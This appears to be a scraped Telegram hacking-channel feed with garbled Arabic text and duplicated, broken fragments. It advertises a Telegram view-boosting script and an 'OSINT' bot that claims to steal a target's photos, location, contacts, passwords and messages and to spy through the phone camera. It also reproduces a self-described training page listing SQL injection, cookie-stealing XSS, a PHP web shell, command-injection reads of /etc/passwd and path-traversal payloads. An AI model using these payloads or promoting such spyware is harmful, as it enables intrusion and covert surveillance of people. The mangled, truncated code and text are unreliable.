Forwarded from ๐ฆSHARK NET
.trashed-1781696855-ุฑุดู_ุชููุฑุงู
.py
3.1 KB
eadat rashq tilikram
hata rabit manshur wakhaliyh shaghal bikhalfayh wahu yajib mushahadat kulama khaliatuh shighal kulama azad mushahadat lataghayar masdar watukhmut aladawat watasir sharif watakul nas maliun dhimuh aly taghayur ay huquq aw yunshar bidun dhikr masdar 'asasiin๐ฆ
@X0XjX
ุจุณู ุงููู ุงูุฑุญู ู ุฑุญูู โค๏ธโ๐ฅ
ุงุฏุงุช ุฑุดู ุชููุฑุงู
ุญุท ุฑุงุจุท ู ูุดูุฑ ูุฎููู ุดุบุงู ุจุฎูููู ููู ูุฌุจ ู ุดุงูุฏุงุช ููู ุง ุฎููุชู ุดุบุงู ููู ุง ุงุฒุงุฏ ู ุดุงูุฏุงุช ูุง ุชุบูุฑ ู ุตุฏุฑ ูุชุฎู ุท ุงูุงุฏุงุช ูุชุตูุฑ ุดุฑูู ูุชููู ูุงุณ ู ุงูู ุฐู ู ุงูู ูุบูุฑ ุงู ุญููู ุงู ููุดุฑ ุจุฏูู ุฐูุฑ ู ุตุฏุฑ ุงุณุงุณู ๐ฆโบ๏ธ
@X0XjX
hata rabit manshur wakhaliyh shaghal bikhalfayh wahu yajib mushahadat kulama khaliatuh shighal kulama azad mushahadat lataghayar masdar watukhmut aladawat watasir sharif watakul nas maliun dhimuh aly taghayur ay huquq aw yunshar bidun dhikr masdar 'asasiin๐ฆ
@X0XjX
ุจุณู ุงููู ุงูุฑุญู ู ุฑุญูู โค๏ธโ๐ฅ
ุงุฏุงุช ุฑุดู ุชููุฑุงู
ุญุท ุฑุงุจุท ู ูุดูุฑ ูุฎููู ุดุบุงู ุจุฎูููู ููู ูุฌุจ ู ุดุงูุฏุงุช ููู ุง ุฎููุชู ุดุบุงู ููู ุง ุงุฒุงุฏ ู ุดุงูุฏุงุช ูุง ุชุบูุฑ ู ุตุฏุฑ ูุชุฎู ุท ุงูุงุฏุงุช ูุชุตูุฑ ุดุฑูู ูุชููู ูุงุณ ู ุงูู ุฐู ู ุงูู ูุบูุฑ ุงู ุญููู ุงู ููุดุฑ ุจุฏูู ุฐูุฑ ู ุตุฏุฑ ุงุณุงุณู ๐ฆโบ๏ธ
@X0XjX
๐ฅฐ2๐2โค1๐1๐1
ุงููู ุจู//ููุช ุงุฎูู//ูุชู//ูุฑุงู ุจู//ูุฑูู//ูู
ุนุงุฏ ู
ู ุฌุฏูุฏ ๐ฅ๐ฅ
ู ุง ูู ูู ุงู ููุนู ุงูุจู//ููุช ุนู ุทู//ูุฑูู ุฑูู//ูู โ
ู ุนุฑู ุงูุจูุช ๐ฃ
https://t.me/Osint_vNbot?start=0004hy5k44
ููุฏุฑ ๐๐๐๐
ูุณู//ูุุุููุญุจ ุงูุตู@ููุฑ
ูุฎู//ูุุุูุชุฑู ู ููู//ูุน ุงูุดู//ูุฎุต ุจุงูุชูุตูู ๐
ูุณู//ูุญุจ ุฌู ู//ููุน ุฌูู ูุุุู//ูููุงุช ุงููุงุชู ๐ฅ
ูุณู//ูุุุูุญุจ ุฌู ู//ููุน ุงุฑูุงู ุงููุงุชู๐น
ูุณู//ูุุุูุญุจ ุฌู ู//ููุน ุญุณุงุจุงุช ุงูุดุฎุต
ูุณู//ูุุุูุญุจ ุจุงุณูุฑุฏุงุช ุงูุญุณุงุจุงุช โฑ
ู ุชุญูู ูุงู ู ูู ู ููุงุช ุงูุฌูู//ูุงุฒ ู ุน ุฃู ุฑ ุชุดู//ูููุฑ ุงูู ูู//ููุงุช๐
ูุณู//ูุุุูุญุจ ุฌู ู//ููุน ุฑุณู//ูุงุฆู ุงููุงุชูู//ูุณุงุจ ๐
ุชุบู//ููุฑ ุฎูู//ูููุฉ ุงููุงุชู ู ู ุดุงูุฏุฉ ุงูููู//ูุงุชู ูุงูู//ูู
ูุฑุฌู ุงูุนูู ุฃู ูุฐุง ุงูุงุตุฏุงุฑ ุฎุงูู ู ู ุงูุงุฎุทุงุก ุชู ุงู ุง ุงุตุฏุงุฑ V6
ู ุนุฑู ุงูุจูุช
https://t.me/Osint_vNbot?start=0004hy5k44
๐นุฃุนูู ุนู ูุงู ู ุงุฎูุงุก ู ุณุคูููุชู ุนู ุฃู ุงุณุชุฎุฏุงู ู ุณูุฆ ุงู ูู ุบุฑุถ ุงูุดุฑ ููุฐู ุงูุทุฑูุ ุงุณุชุฎุฏู ู ูุฐู ุงูู ูุงุฑุงุช ุจุดูู ุฃุฎูุงูู ูุงุญุชุฑุงูู ููุท.
ู ุง ูู ูู ุงู ููุนู ุงูุจู//ููุช ุนู ุทู//ูุฑูู ุฑูู//ูู โ
ู ุนุฑู ุงูุจูุช ๐ฃ
ููุฏุฑ ๐๐๐๐
ูุณู//ูุุุููุญุจ ุงูุตู@ููุฑ
ูุฎู//ูุุุูุชุฑู ู ููู//ูุน ุงูุดู//ูุฎุต ุจุงูุชูุตูู ๐
ูุณู//ูุญุจ ุฌู ู//ููุน ุฌูู ูุุุู//ูููุงุช ุงููุงุชู ๐ฅ
ูุณู//ูุุุูุญุจ ุฌู ู//ููุน ุงุฑูุงู ุงููุงุชู๐น
ูุณู//ูุุุูุญุจ ุฌู ู//ููุน ุญุณุงุจุงุช ุงูุดุฎุต
ูุณู//ูุุุูุญุจ ุจุงุณูุฑุฏุงุช ุงูุญุณุงุจุงุช โฑ
ู ุชุญูู ูุงู ู ูู ู ููุงุช ุงูุฌูู//ูุงุฒ ู ุน ุฃู ุฑ ุชุดู//ูููุฑ ุงูู ูู//ููุงุช๐
ูุณู//ูุุุูุญุจ ุฌู ู//ููุน ุฑุณู//ูุงุฆู ุงููุงุชูู//ูุณุงุจ ๐
ุชุบู//ููุฑ ุฎูู//ูููุฉ ุงููุงุชู ู ู ุดุงูุฏุฉ ุงูููู//ูุงุชู ูุงูู//ูู
ูุฑุฌู ุงูุนูู ุฃู ูุฐุง ุงูุงุตุฏุงุฑ ุฎุงูู ู ู ุงูุงุฎุทุงุก ุชู ุงู ุง ุงุตุฏุงุฑ V6
ู ุนุฑู ุงูุจูุช
๐นุฃุนูู ุนู ูุงู ู ุงุฎูุงุก ู ุณุคูููุชู ุนู ุฃู ุงุณุชุฎุฏุงู ู ุณูุฆ ุงู ูู ุบุฑุถ ุงูุดุฑ ููุฐู ุงูุทุฑูุ ุงุณุชุฎุฏู ู ูุฐู ุงูู ูุงุฑุงุช ุจุดูู ุฃุฎูุงูู ูุงุญุชุฑุงูู ููุท.
Telegram
Osint bot
ุฃุนูู ุนู ูุงู
ู ุงุฎูุงุก ู
ุณุคูููุชู ุนู ุฃู ุงุณุชุฎุฏุงู
ู
ุณูุฆ ุงู ูู ุบุฑุถ ุงูุดุฑ ููุฐู ุงูุทุฑูุ ุงุณุชุฎุฏู
ู ูุฐู ุงูู
ูุงุฑุงุช ุจุดูู ุฃุฎูุงูู ูุงุญุชุฑุงูู ููุท.
๐2โค1๐ฅฐ1๐1๐1
<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>ู ููุน ุงุฎุชุจุงุฑ ุงุฎุชุฑุงู ุชุนููู ู - Vulnerable Lab</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background: linear-gradient(135deg, #0a0a0a 0%, #1a1a2e 100%);
min-height: 100vh;
color: #fff;
}
.header {
background: linear-gradient(135deg, #e74c3c, #c0392b);
padding: 20px;
text-align: center;
box-shadow: 0 4px 15px rgba(0,0,0,0.3);
}
.header h1 {
font-size: 2rem;
margin-bottom: 5px;
}
.header p {
font-size: 0.9rem;
opacity: 0.9;
}
.warning {
background: #ff9800;
color: #000;
padding: 10px;
text-align: center;
font-weight: bold;
}
.container {
max-width: 1200px;
margin: 0 auto;
padding: 20px;
}
.vulnerability-card {
background: rgba(255,255,255,0.1);
backdrop-filter: blur(10px);
border-radius: 15px;
padding: 20px;
margin-bottom: 20px;
border-left: 5px solid #e74c3c;
}
.vulnerability-card h2 {
color: #ff6b6b;
margin-bottom: 15px;
}
.vulnerability-card h3 {
color: #ffa502;
margin: 15px 0 10px 0;
}
input, textarea, select {
background: rgba(0,0,0,0.5);
border: 1px solid #555;
padding: 10px;
color: #fff;
border-radius: 5px;
width: 100%;
max-width: 400px;
margin: 5px 0;
}
button {
background: #e74c3c;
color: white;
border: none;
padding: 10px 20px;
border-radius: 5px;
cursor: pointer;
transition: transform 0.2s;
}
button:hover {
transform: scale(1.05);
background: #c0392b;
}
.result {
background: rgba(0,0,0,0.7);
padding: 15px;
border-radius: 8px;
margin-top: 15px;
font-family: monospace;
overflow-x: auto;
}
.sql-result, .xss-result, .upload-result {
color: #2ecc71;
}
.error {
color: #e74c3c;
}
footer {
text-align: center;
padding: 20px;
background: rgba(0,0,0,0.5);
margin-top: 40px;
}
.badge {
display: inline-block;
background: #e74c3c;
padding: 3px 8px;
border-radius: 3px;
font-size: 0.7rem;
margin-left: 10px;
}
table {
width: 100%;
border-collapse: collapse;
margin-top: 10px;
}
th, td {
border: 1px solid #555;
padding: 8px;
text-align: left;
}
th {
background: #e74c3c;
}
.login-box {
background: rgba(0,0,0,0.5);
padding: 20px;
border-radius: 10px;
max-width: 350px;
margin: 20px auto;
}
.login-box input {
width: 100%;
<html lang="ar">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>ู ููุน ุงุฎุชุจุงุฑ ุงุฎุชุฑุงู ุชุนููู ู - Vulnerable Lab</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
background: linear-gradient(135deg, #0a0a0a 0%, #1a1a2e 100%);
min-height: 100vh;
color: #fff;
}
.header {
background: linear-gradient(135deg, #e74c3c, #c0392b);
padding: 20px;
text-align: center;
box-shadow: 0 4px 15px rgba(0,0,0,0.3);
}
.header h1 {
font-size: 2rem;
margin-bottom: 5px;
}
.header p {
font-size: 0.9rem;
opacity: 0.9;
}
.warning {
background: #ff9800;
color: #000;
padding: 10px;
text-align: center;
font-weight: bold;
}
.container {
max-width: 1200px;
margin: 0 auto;
padding: 20px;
}
.vulnerability-card {
background: rgba(255,255,255,0.1);
backdrop-filter: blur(10px);
border-radius: 15px;
padding: 20px;
margin-bottom: 20px;
border-left: 5px solid #e74c3c;
}
.vulnerability-card h2 {
color: #ff6b6b;
margin-bottom: 15px;
}
.vulnerability-card h3 {
color: #ffa502;
margin: 15px 0 10px 0;
}
input, textarea, select {
background: rgba(0,0,0,0.5);
border: 1px solid #555;
padding: 10px;
color: #fff;
border-radius: 5px;
width: 100%;
max-width: 400px;
margin: 5px 0;
}
button {
background: #e74c3c;
color: white;
border: none;
padding: 10px 20px;
border-radius: 5px;
cursor: pointer;
transition: transform 0.2s;
}
button:hover {
transform: scale(1.05);
background: #c0392b;
}
.result {
background: rgba(0,0,0,0.7);
padding: 15px;
border-radius: 8px;
margin-top: 15px;
font-family: monospace;
overflow-x: auto;
}
.sql-result, .xss-result, .upload-result {
color: #2ecc71;
}
.error {
color: #e74c3c;
}
footer {
text-align: center;
padding: 20px;
background: rgba(0,0,0,0.5);
margin-top: 40px;
}
.badge {
display: inline-block;
background: #e74c3c;
padding: 3px 8px;
border-radius: 3px;
font-size: 0.7rem;
margin-left: 10px;
}
table {
width: 100%;
border-collapse: collapse;
margin-top: 10px;
}
th, td {
border: 1px solid #555;
padding: 8px;
text-align: left;
}
th {
background: #e74c3c;
}
.login-box {
background: rgba(0,0,0,0.5);
padding: 20px;
border-radius: 10px;
max-width: 350px;
margin: 20px auto;
}
.login-box input {
width: 100%;
๐2โค1๐1๐ฅฐ1๐1
margin: 10px 0;
}
</style>
</head>
<body>
<div class="header">
<h1>๐ ู ููุน ุงุฎุชุจุงุฑ ุงูุงุฎุชุฑุงู ุงูุชุนููู ู ๐</h1>
<p>Vulnerable Web Application - ููุฃุบุฑุงุถ ุงูุชุนููู ูุฉ ููุท</p>
</div>
<div class="warning">
โ ๏ธ ูุฐุง ุงูู ููุน ููุฃุบุฑุงุถ ุงูุชุนููู ูุฉ ููุท. ูุง ุชุณุชุฎุฏู ู ุนูู ุฃุฌูุฒุฉ ูุง ุชู ูููุง ุฃู ุจุฏูู ุฅุฐู! โ ๏ธ
</div>
<div class="container">
<!-- ุซุบุฑุฉ 1: SQL Injection -->
<div class="vulnerability-card">
<h2>๐ด 1. ุซุบุฑุฉ ุญูู SQL (SQL Injection) <span class="badge">ู ุณุชูู: ุณูู</span></h2>
<p>ูุฐู ุงูุตูุญุฉ ุชุนุฑุถ ุจูุงูุงุช ุงูู ุณุชุฎุฏู ูู. ุญุงูู ุฅุฏุฎุงู: <code>' OR '1'='1</code> ูุนุฑุถ ุฌู ูุน ุงูุจูุงูุงุช!</p>
<h3>๐ ุงูุจุญุซ ุนู ู ุณุชุฎุฏู :</h3>
<input type="text" id="sql-search" placeholder="ุฃุฏุฎู ุงุณู ุงูู ุณุชุฎุฏู ...">
<button onclick="sql_injection()">๐ ุจุญุซ</button>
<div id="sql-result" class="result"></div>
<h3>๐ก ุฃู ุซูุฉ ููุงุฎุชุจุงุฑ:</h3>
<code>admin' --</code><br>
<code>' OR '1'='1</code><br>
<code>admin' OR '1'='1' --</code><br>
<code>'; DROP TABLE users; --</code>
</div>
<!-- ุซุบุฑุฉ 2: XSS (Cross-Site Scripting) -->
<div class="vulnerability-card">
<h2>๐ 2. ุซุบุฑุฉ ุงูุจุฑู ุฌุฉ ุงููุตูุฉ ุนุจุฑ ุงูู ูุงูุน (XSS) <span class="badge">ู ุณุชูู: ุณูู</span></h2>
<p>ูุฐู ุงูุตูุญุฉ ุชุนุฑุถ ู ุง ุชูุชุจู ุฏูู ุชูููุฉ. ุฌุฑุจ: <code><script>alert('Hacked!')</script></code></p>
<h3>๐ฌ็่จ:</h3>
<input type="text" id="xss-input" placeholder="ุงูุชุจ ุชุนูููู...">
<button onclick="xss_attack()">๐ ุฅุฑุณุงู</button>
<div id="xss-result" class="result"></div>
<h3>๐ก ุฃู ุซูุฉ ููุงุฎุชุจุงุฑ:</h3>
<code><script>alert(document.cookie)</script></code><br>
<code><img src=x onerror=alert(1)></code><br>
<code><body onload=alert('XSS')></code><br>
<code><svg onload=alert(1)></code>
</div>
<!-- ุซุบุฑุฉ 3: ุฑูุน ุงูู ููุงุช ุงูุฎุจูุซุฉ -->
<div class="vulnerability-card">
<h2>๐ก 3. ุฑูุน ุงูู ููุงุช ุงูุฎุจูุซุฉ (Malicious File Upload) <span class="badge">ู ุณุชูู: ู ุชูุณุท</span></h2>
<p>ุญุงูู ุฑูุน ู ูู ูุตู ูุญุชูู ุนูู ููุฏ PHP ุฃู JavaScript!</p>
<h3>๐ ุฑูุน ู ูู:</h3>
<input type="file" id="file-upload" accept=".txt,.php,.html,.js">
<button onclick="upload_file()">๐ค ุฑูุน ุงูู ูู</button>
<div id="upload-result" class="result"></div>
<h3>๐ก ุฃู ุซูุฉ: ุฃูุดุฆ ู ูู test.php ุจุงูู ุญุชูู:</h3>
<code><?php system($_GET['cmd']); ?></code>
</div>
<!-- ุซุบุฑุฉ 4: Command Injection -->
<div class="vulnerability-card">
<h2>๐ข 4. ุญูู ุงูุฃูุงู ุฑ (Command Injection) <span class="badge">ู ุณุชูู: ุณูู</span></h2>
<p>ูุฐู ุงูุตูุญุฉ ุชููุฐ ุฃูุงู ุฑ ุงููุธุงู . ุฌุฑุจ: <code>127.0.0.1; ls</code></p>
<h3>๐ ping:</h3>
<input type="text" id="cmd-input" placeholder="ุฃุฏุฎู ุนููุงู IP...">
<button onclick="cmd_injection()">๐ก Ping</button>
<div id="cmd-result" class="result"></div>
<h3>๐ก ุฃู ุซูุฉ ููุงุฎุชุจุงุฑ:</h3>
<code>127.0.0.1; cat /etc/passwd</code><br>
<code>127.0.0.1 | whoami</code><br>
<code>127.0.0.1 && ls -la</code><br>
<code>127.0.0.1 || dir</code>
</div>
<!-- ุซุบุฑุฉ 5: ุชุณุฌูู ุฏุฎูู ุถุนูู -->
<div class="vulnerability-card">
<h2>๐ต 5. ุซุบุฑุฉ ุงูู ุตุงุฏูุฉ (Authentication Bypass) <span class="badge">ู ุณุชูู: ุณูู</span></h2>
<p>ุญุงูู ุชุฌุงูุฒ ุตูุญุฉ ุชุณุฌูู ุงูุฏุฎูู ุจุงุณุชุฎุฏุงู ุญูู SQL!</p>
<div class="login-box">
}
</style>
</head>
<body>
<div class="header">
<h1>๐ ู ููุน ุงุฎุชุจุงุฑ ุงูุงุฎุชุฑุงู ุงูุชุนููู ู ๐</h1>
<p>Vulnerable Web Application - ููุฃุบุฑุงุถ ุงูุชุนููู ูุฉ ููุท</p>
</div>
<div class="warning">
โ ๏ธ ูุฐุง ุงูู ููุน ููุฃุบุฑุงุถ ุงูุชุนููู ูุฉ ููุท. ูุง ุชุณุชุฎุฏู ู ุนูู ุฃุฌูุฒุฉ ูุง ุชู ูููุง ุฃู ุจุฏูู ุฅุฐู! โ ๏ธ
</div>
<div class="container">
<!-- ุซุบุฑุฉ 1: SQL Injection -->
<div class="vulnerability-card">
<h2>๐ด 1. ุซุบุฑุฉ ุญูู SQL (SQL Injection) <span class="badge">ู ุณุชูู: ุณูู</span></h2>
<p>ูุฐู ุงูุตูุญุฉ ุชุนุฑุถ ุจูุงูุงุช ุงูู ุณุชุฎุฏู ูู. ุญุงูู ุฅุฏุฎุงู: <code>' OR '1'='1</code> ูุนุฑุถ ุฌู ูุน ุงูุจูุงูุงุช!</p>
<h3>๐ ุงูุจุญุซ ุนู ู ุณุชุฎุฏู :</h3>
<input type="text" id="sql-search" placeholder="ุฃุฏุฎู ุงุณู ุงูู ุณุชุฎุฏู ...">
<button onclick="sql_injection()">๐ ุจุญุซ</button>
<div id="sql-result" class="result"></div>
<h3>๐ก ุฃู ุซูุฉ ููุงุฎุชุจุงุฑ:</h3>
<code>admin' --</code><br>
<code>' OR '1'='1</code><br>
<code>admin' OR '1'='1' --</code><br>
<code>'; DROP TABLE users; --</code>
</div>
<!-- ุซุบุฑุฉ 2: XSS (Cross-Site Scripting) -->
<div class="vulnerability-card">
<h2>๐ 2. ุซุบุฑุฉ ุงูุจุฑู ุฌุฉ ุงููุตูุฉ ุนุจุฑ ุงูู ูุงูุน (XSS) <span class="badge">ู ุณุชูู: ุณูู</span></h2>
<p>ูุฐู ุงูุตูุญุฉ ุชุนุฑุถ ู ุง ุชูุชุจู ุฏูู ุชูููุฉ. ุฌุฑุจ: <code><script>alert('Hacked!')</script></code></p>
<h3>๐ฌ็่จ:</h3>
<input type="text" id="xss-input" placeholder="ุงูุชุจ ุชุนูููู...">
<button onclick="xss_attack()">๐ ุฅุฑุณุงู</button>
<div id="xss-result" class="result"></div>
<h3>๐ก ุฃู ุซูุฉ ููุงุฎุชุจุงุฑ:</h3>
<code><script>alert(document.cookie)</script></code><br>
<code><img src=x onerror=alert(1)></code><br>
<code><body onload=alert('XSS')></code><br>
<code><svg onload=alert(1)></code>
</div>
<!-- ุซุบุฑุฉ 3: ุฑูุน ุงูู ููุงุช ุงูุฎุจูุซุฉ -->
<div class="vulnerability-card">
<h2>๐ก 3. ุฑูุน ุงูู ููุงุช ุงูุฎุจูุซุฉ (Malicious File Upload) <span class="badge">ู ุณุชูู: ู ุชูุณุท</span></h2>
<p>ุญุงูู ุฑูุน ู ูู ูุตู ูุญุชูู ุนูู ููุฏ PHP ุฃู JavaScript!</p>
<h3>๐ ุฑูุน ู ูู:</h3>
<input type="file" id="file-upload" accept=".txt,.php,.html,.js">
<button onclick="upload_file()">๐ค ุฑูุน ุงูู ูู</button>
<div id="upload-result" class="result"></div>
<h3>๐ก ุฃู ุซูุฉ: ุฃูุดุฆ ู ูู test.php ุจุงูู ุญุชูู:</h3>
<code><?php system($_GET['cmd']); ?></code>
</div>
<!-- ุซุบุฑุฉ 4: Command Injection -->
<div class="vulnerability-card">
<h2>๐ข 4. ุญูู ุงูุฃูุงู ุฑ (Command Injection) <span class="badge">ู ุณุชูู: ุณูู</span></h2>
<p>ูุฐู ุงูุตูุญุฉ ุชููุฐ ุฃูุงู ุฑ ุงููุธุงู . ุฌุฑุจ: <code>127.0.0.1; ls</code></p>
<h3>๐ ping:</h3>
<input type="text" id="cmd-input" placeholder="ุฃุฏุฎู ุนููุงู IP...">
<button onclick="cmd_injection()">๐ก Ping</button>
<div id="cmd-result" class="result"></div>
<h3>๐ก ุฃู ุซูุฉ ููุงุฎุชุจุงุฑ:</h3>
<code>127.0.0.1; cat /etc/passwd</code><br>
<code>127.0.0.1 | whoami</code><br>
<code>127.0.0.1 && ls -la</code><br>
<code>127.0.0.1 || dir</code>
</div>
<!-- ุซุบุฑุฉ 5: ุชุณุฌูู ุฏุฎูู ุถุนูู -->
<div class="vulnerability-card">
<h2>๐ต 5. ุซุบุฑุฉ ุงูู ุตุงุฏูุฉ (Authentication Bypass) <span class="badge">ู ุณุชูู: ุณูู</span></h2>
<p>ุญุงูู ุชุฌุงูุฒ ุตูุญุฉ ุชุณุฌูู ุงูุฏุฎูู ุจุงุณุชุฎุฏุงู ุญูู SQL!</p>
<div class="login-box">
โค2๐2๐ฅฐ1๐1
<h3>๐ ุชุณุฌูู ุงูุฏุฎูู (Admin Panel)</h3>
<input type="text" id="login-username" placeholder="ุงุณู ุงูู ุณุชุฎุฏู ">
<input type="password" id="login-password" placeholder="ููู ุฉ ุงูู ุฑูุฑ">
<button onclick="login_attempt()">๐ช ุฏุฎูู</button>
<div id="login-result" class="result" style="margin-top: 10px;"></div>
</div>
<h3>๐ก ุฃู ุซูุฉ ููุงุฎุชุจุงุฑ:</h3>
<code>admin' --</code> (ููู ุฉ ุงูู ุฑูุฑ ุฃู ุดูุก)<br>
<code>' OR '1'='1</code><br>
<code>admin' OR '1'='1' --</code>
</div>
<!-- ุซุบุฑุฉ 6: IDOR -->
<div class="vulnerability-card">
<h2>๐ฃ 6. ุซุบุฑุฉ IDOR (Insecure Direct Object Reference) <span class="badge">ู ุณุชูู: ู ุชูุณุท</span></h2>
<p>ุญุงูู ุชุบููุฑ ุฑูู ุงูู ุนุฑู ูุนุฑุถ ุจูุงูุงุช ู ุณุชุฎุฏู ูู ุขุฎุฑูู!</p>
<h3>๐ ุนุฑุถ ุงูู ูู ุงูุดุฎุตู:</h3>
<input type="number" id="idor-id" placeholder="ุฃุฏุฎู ุฑูู ุงูู ุณุชุฎุฏู (1-5)" value="1">
<button onclick="idor_attack()">๐ค ุนุฑุถ</button>
<div id="idor-result" class="result"></div>
</div>
<!-- ุซุบุฑุฉ 7: Path Traversal -->
<div class="vulnerability-card">
<h2>๐ค 7. ุซุบุฑุฉ ุงุฌุชูุงุฒ ุงูู ุณุงุฑ (Path Traversal) <span class="badge">ู ุณุชูู: ู ุชูุณุท</span></h2>
<p>ุญุงูู ูุฑุงุกุฉ ู ููุงุช ุงููุธุงู ุงูุญุณุงุณุฉ!</p>
<h3>๐ ุนุฑุถ ู ูู:</h3>
<input type="text" id="path-input" placeholder="ุงุณู ุงูู ูู (ู ุซุงู: test.txt)">
<button onclick="path_traversal()">๐ ูุฑุงุกุฉ</button>
<div id="path-result" class="result"></div>
<h3>๐ก ุฃู ุซูุฉ ููุงุฎุชุจุงุฑ:</h3>
<code>../../../../etc/passwd</code><br>
<code>../../windows/win.ini</code><br>
<code>../config.php</code>
</div>
</div>
<footer>
<p>๐ ู ููุน ุงุฎุชุจุงุฑ ุงุฎุชุฑุงู ุชุนููู ู - ููู ุทูุฑูู ูุงูู ุฎุชุจุฑููู ุงูุฃุฎูุงูููู ๐</p>
<p>Developed by @X0XjX - ูุฃุบุฑุงุถ ุชุนููู ูุฉ ููุท</p>
<p>โ ๏ธ ูุง ุชุณุชุฎุฏู ูุฐู ุงูุซุบุฑุงุช ุนูู ู ูุงูุน ุญููููุฉ - ูุฐุง ุงูู ููุน ุขู ู ูู ุนุฒูู โ ๏ธ</p>
</footer>
<script>
// ูุงุนุฏุฉ ุจูุงูุงุช ููู ูุฉ
const users = [
{ id: 1, username: "admin", password: "admin123", email: "admin@test.com", role: "ู ุฏูุฑ ุงููุธุงู " },
{ id: 2, username: "user1", password: "pass123", email: "user1@test.com", role: "ู ุณุชุฎุฏู ุนุงุฏู" },
{ id: 3, username: "test", password: "test123", email: "test@test.com", role: "ู ุฎุชุจูุฑ" },
{ id: 4, username: "hacker", password: "hack123", email: "hacker@test.com", role: "ูุฑุตุงู ุฃุฎูุงูู" },
{ id: 5, username: "guest", password: "guest", email: "guest@test.com", role: "ุฒุงุฆุฑ" }
];
// 1. SQL Injection
function sql_injection() {
let input = document.getElementById('sql-search').value;
let resultDiv = document.getElementById('sql-result');
// ู ุญุงูุงุฉ ุซุบุฑุฉ SQL
if (input.includes("'") input.includes("OR") input.includes("--")) {
// ุนุฑุถ ุฌู ูุน ุงูุจูุงูุงุช (ู ุญุงูุงุฉ ุงูุญูู)
let html = '<table><tr><th>ID</th><th>Username</th><th>Email</th><th>Role</th></tr>';
users.forEach(user => {
html +=
});
html += '</table>';
resultDiv.innerHTML =
resultDiv.innerHTML +=
} else if (input) {
let found = users.find(u => u.username === input);
<input type="text" id="login-username" placeholder="ุงุณู ุงูู ุณุชุฎุฏู ">
<input type="password" id="login-password" placeholder="ููู ุฉ ุงูู ุฑูุฑ">
<button onclick="login_attempt()">๐ช ุฏุฎูู</button>
<div id="login-result" class="result" style="margin-top: 10px;"></div>
</div>
<h3>๐ก ุฃู ุซูุฉ ููุงุฎุชุจุงุฑ:</h3>
<code>admin' --</code> (ููู ุฉ ุงูู ุฑูุฑ ุฃู ุดูุก)<br>
<code>' OR '1'='1</code><br>
<code>admin' OR '1'='1' --</code>
</div>
<!-- ุซุบุฑุฉ 6: IDOR -->
<div class="vulnerability-card">
<h2>๐ฃ 6. ุซุบุฑุฉ IDOR (Insecure Direct Object Reference) <span class="badge">ู ุณุชูู: ู ุชูุณุท</span></h2>
<p>ุญุงูู ุชุบููุฑ ุฑูู ุงูู ุนุฑู ูุนุฑุถ ุจูุงูุงุช ู ุณุชุฎุฏู ูู ุขุฎุฑูู!</p>
<h3>๐ ุนุฑุถ ุงูู ูู ุงูุดุฎุตู:</h3>
<input type="number" id="idor-id" placeholder="ุฃุฏุฎู ุฑูู ุงูู ุณุชุฎุฏู (1-5)" value="1">
<button onclick="idor_attack()">๐ค ุนุฑุถ</button>
<div id="idor-result" class="result"></div>
</div>
<!-- ุซุบุฑุฉ 7: Path Traversal -->
<div class="vulnerability-card">
<h2>๐ค 7. ุซุบุฑุฉ ุงุฌุชูุงุฒ ุงูู ุณุงุฑ (Path Traversal) <span class="badge">ู ุณุชูู: ู ุชูุณุท</span></h2>
<p>ุญุงูู ูุฑุงุกุฉ ู ููุงุช ุงููุธุงู ุงูุญุณุงุณุฉ!</p>
<h3>๐ ุนุฑุถ ู ูู:</h3>
<input type="text" id="path-input" placeholder="ุงุณู ุงูู ูู (ู ุซุงู: test.txt)">
<button onclick="path_traversal()">๐ ูุฑุงุกุฉ</button>
<div id="path-result" class="result"></div>
<h3>๐ก ุฃู ุซูุฉ ููุงุฎุชุจุงุฑ:</h3>
<code>../../../../etc/passwd</code><br>
<code>../../windows/win.ini</code><br>
<code>../config.php</code>
</div>
</div>
<footer>
<p>๐ ู ููุน ุงุฎุชุจุงุฑ ุงุฎุชุฑุงู ุชุนููู ู - ููู ุทูุฑูู ูุงูู ุฎุชุจุฑููู ุงูุฃุฎูุงูููู ๐</p>
<p>Developed by @X0XjX - ูุฃุบุฑุงุถ ุชุนููู ูุฉ ููุท</p>
<p>โ ๏ธ ูุง ุชุณุชุฎุฏู ูุฐู ุงูุซุบุฑุงุช ุนูู ู ูุงูุน ุญููููุฉ - ูุฐุง ุงูู ููุน ุขู ู ูู ุนุฒูู โ ๏ธ</p>
</footer>
<script>
// ูุงุนุฏุฉ ุจูุงูุงุช ููู ูุฉ
const users = [
{ id: 1, username: "admin", password: "admin123", email: "admin@test.com", role: "ู ุฏูุฑ ุงููุธุงู " },
{ id: 2, username: "user1", password: "pass123", email: "user1@test.com", role: "ู ุณุชุฎุฏู ุนุงุฏู" },
{ id: 3, username: "test", password: "test123", email: "test@test.com", role: "ู ุฎุชุจูุฑ" },
{ id: 4, username: "hacker", password: "hack123", email: "hacker@test.com", role: "ูุฑุตุงู ุฃุฎูุงูู" },
{ id: 5, username: "guest", password: "guest", email: "guest@test.com", role: "ุฒุงุฆุฑ" }
];
// 1. SQL Injection
function sql_injection() {
let input = document.getElementById('sql-search').value;
let resultDiv = document.getElementById('sql-result');
// ู ุญุงูุงุฉ ุซุบุฑุฉ SQL
if (input.includes("'")
// ุนุฑุถ ุฌู ูุน ุงูุจูุงูุงุช (ู ุญุงูุงุฉ ุงูุญูู)
let html = '<table><tr><th>ID</th><th>Username</th><th>Email</th><th>Role</th></tr>';
users.forEach(user => {
html +=
<tr><td>${user.id}</td><td>${user.username}</td><td>${user.email}</td><td>${user.role}</td></tr>;});
html += '</table>';
resultDiv.innerHTML =
<div class="sql-result">โ
ุชู
ุญูู SQL ุจูุฌุงุญ! ุชู
ุนุฑุถ ุฌู
ูุน ุงูู
ุณุชุฎุฏู
ูู:<br>${html}</div>;resultDiv.innerHTML +=
<div class="error">โ ๏ธ ุชุญุฐูุฑ: ูุฐู ุซุบุฑุฉ ุญููููุฉ ูู ููุงุนุฏ ุงูุจูุงูุงุช! ุชุนูู
ููููุฉ ุงุณุชุฎุฏุงู
prepared statements.</div>;} else if (input) {
let found = users.find(u => u.username === input);
๐2โค1๐1๐ฅฐ1๐1
if (found) {
resultDiv.innerHTML =
